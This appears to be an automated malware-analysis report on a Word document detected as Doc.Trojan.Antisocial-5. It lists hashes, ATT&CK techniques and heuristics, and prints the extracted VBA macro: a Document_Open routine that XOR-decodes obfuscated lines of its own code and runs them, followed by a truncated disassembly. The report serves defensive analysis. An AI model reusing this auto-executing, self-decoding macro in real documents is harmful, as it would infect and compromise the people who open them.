Office (OLE) malware analysis — malicious · 480a32f55fe1236a

MALICIOUS

Office (OLE)

170.5 KB Created: 2000-04-01 22:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7e434dd82189fec148f0a9f6063ad1e8 SHA-1: 7028ad7d6d55e9b7a24c2820b77ea08c147818e8 SHA-256: 480a32f55fe1236a09c2db89ef74fee6cdeeba5739a5b2709eae3ba1d3ad3aa2

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro is present and attempts to deobfuscate and execute code. The deobfuscated code is truncated, but the overall structure suggests it's designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Antisocial-5' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Antisocial-5 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Antisocial-5
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8312 bytes
SHA-256: `a78b7e95d1ac6714af8414e911d9554a08b1faf4a3a5fc11f505dd64dd50ab15`
Detection ClamAV: Doc.Trojan.Antisocial-5 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Application.EnableCancelKey = wdCancelDisabled For V1 = 16 To 34 V2 = Null V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1)) V4 = Asc((Mid(V3, 2, 1))) Xor Asc((Mid(V3, 3, 1))) For V5 = 5 To Len(V3) Step 2 V6 = Asc(Mid(V3, V5, 1)) Xor V4 V2 = V2 & Chr(V6) Next ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V2 Next Demo End Sub Private Function Demo() '½¸¡Jakd%Ì@$wÉwÕj¾w+%\|Wà`Ðvspöhâ`-%óKq`•}Ëq, '¤ cB«k°v[$_EÙ$Ø9£$û5ë2S$»PúkW$—780þ '·¶ C7!7<Ò!`B+ibsu)cHóoúuz)^)DSEo°e\|!\|+¿!i33O3J(¢!2†!ê2[2Ï(u(a 'íë¬E€&6;�&»Dë&Ú &&™.ìR€n·o�u“B‡ioezs\k-cWhúr.(wPrD�VCtŠiZl¬c™eCrñ(²P‘DwE8iÏk‡vÈi¥hÙc%hOr1u8(jO=r!c˜k².™7Ø/3(KE·i…bpcBK½iïb–s4jÉcz(‡JŽoOhjc6u£.FGî6&ƒ7]/â/Ç '][YB4&';h&ÐObhUr‹.YTlhbŒ.N/à&£,È&î>j/™&2-&\|7ö ':2ªNngBz‹(QMý(=5'(m9š(í\˜g{(ÝDØm¶fÁ þKl!Ž '\|zH@~&™;Õ&™G u’eS.ªK�o¸bå.sEdb&BC–R&¢7q/ã/‹&K^¸iÆt©&ÎBD 'ÔÖõ@/".?Ñ"u@‡";$:"GA+j¿p—�DQ+ˆ"Æ$È"yAéjÆp4K¿l$v€z^PûlÓf»"}(Ä"^0p0�0ò+;"°)n"81J12+�+õ '™�øJQau\|xp_$�A? '“›œ\ê`²a‚{ºL/gÈk¼}�eCmRfi\|Ï&,^“JÉXÒzigøbÓm¶ké\|ã&}^<JôKÒg»ezx$gFfEm’f{\|8{^&¯AÝ\|�mJeè s9h!Ì&QK„gUläm¨Etgwlà}£dïm“&jZámZxZdHink!mÅDÛa^f½mz(ÕIÅ$‚(2\|/l¾(f.Ò(BJ¤ 'õ÷ñL:gûzv¥"éC 'WP1H‚wÉsWnuhyi•t])¢QOn2uçr9t±WèuThósÜb‚dŽsËnÚhuiL'i:\|'BAªf7kNtºb� 'IA‰G!x \|aaÈgæf×{H&9[#iB~tmJFúgâz¢eÂiAdZX'zØgÎeÐxj\|…(œ5Ó(žNNiOdq{ mm '–’ K,tšpNmökðjýwÛ{GÓküjZbGm»v$ilGºk9j9raayv�wfmbkÔjewt$z9Û${BÁe³h{wóa° '“‘¢VÇF†"é?_"µVæj_krq$FbmûaÊw¡o§g\l‘vÑ,ßT5@™R}p1m…h¼g�a{vò,ûT¤@—A©m4oIr_m%lBg~lšvœqÎ,K{v.gfo¦“3¥+j,êAËm f€gÃOEm.fWwÉnôgm,¸NÐk(lÑgŒqN¦3ê.ò"²V$j³k÷q#Fôm1abw¢oÔg)l-vž,fT\|@’RÃp…mhh1g{a vÊ,¡T±@ÔA}mÑoÁrºmÃlKgÌl0vXqó,×KQvIgUoîZ3Y+¿,´AÌmÉfegØOÀmçfRwpn›go,NA¡m¬w?l.vMÛd¯N kJlŽgùqË+u 'Œ‰¶L)c°%èQlm;l vÌApj\|fÆp�hÀ`‘kGq^%48ú%_DªfeqÞlgsÑ`GAcj1fŽp…h¥`'kgq?%iQÉm¬`ökØ%›V§`Kqé%gQ¦d¥wËb¿`¹qÉ%Z8›%’Kžj_w}hndøi”Q¢`ˆh(uti?d²qC`L%t@6i©v¼`‚%~Vk`¼qP%Qådw†bÅ`Èq×%O8‰%áDØf\|q‡lnsX`ÔA™j˜f¬p4h¾`Zk-q^ 'öõ°WqbsqidPfPw~-ªUVA¹S£q¦l2ifC`Wwy-¢U`AÚ@èl•nws!lXmEf°múwfpV-äJ=wŸf§n¨+»2Ý6-x@×l\g·fxNÚl�gÚvQoÃfè-QGûf÷oâf•w±f†OCj¯m©fÞpr#,2‘/-#tW…bcq÷d#f±w©-—U'AÀSfqúlaiqfh`owU-¤U¼A\@ l¡nüsïlXmÔfËm{w¬pŽ-�J>wøfHn£+¸29±-Ä@Îl€g3f�N l.g\|v;oAff-ü@§l^v}m‰w/L†e‚Oòj]mGf‘pm '’–ZP/e¯vqcšaäp~¤RuF-T9vAkAnÉa[g?p*ºRÜF“GÒkûi•t0k«jja^j¸pzwvNMãpBazi¨,š5Â-<iG"kÎ`íacISkô`Jq}hqaiúE¡`•`>Bèv'kÐiÀWWpòvˆmÁjycT$¦P›@‡ '±¶/FCd7s,nšqõbSCmhæd‹rTjÝb0i>s÷)ÚT×fþqVb´F«tø'~A-nãkEbXI§frj–bì=š:öFÊdzsÈn qƒb+C)hqd}rrjbHi�sC)øA]r.kÓk¾IXfÐjâbû End Function ' Processing file: /opt/analyzer/scan_staging/946bd42b49ec49f68834c28cb7ba0c86.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 138154 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' Ld wdCancelDisabled ' Ld Application ' MemSt EnableCancelKey ' Line #2: ' StartForVariable ' Ld V1 ' EndForVariable ' LitDI2 0x0010 ' LitDI2 0x0022 ' For ' Line #3: ' LitVarSpecial (Null) ' St V2 ' Line #4: ' Ld V1 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Paren ' St V3 ' Line #5: ' Ld V3 ' LitDI2 0x0002 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' Paren ' ArgsLd Asc 0x0001 ' Ld V3 ' LitDI2 0x0003 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' Paren ' ArgsLd Asc 0x0001 ' Xor ' St V4 ' Line #6: ' StartForVariable ' Ld V5 ' EndForVariable ' LitDI2 0x0005 ' Ld V3 ' FnLen ' LitDI2 0x0002 ' ForStep ' Line #7: ' Ld V3 ' Ld V5 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' ArgsLd Asc 0x0001 ' Ld V4 ' Xor ' St V6 ' Line #8: ' Ld V2 ' Ld V6 ' ArgsLd Chr 0x0001 ' Concat ' St V2 ' Line #9: ' StartForVariable ' Next ' Line #10: ' Ld V1 ' Ld V2 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' Args ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.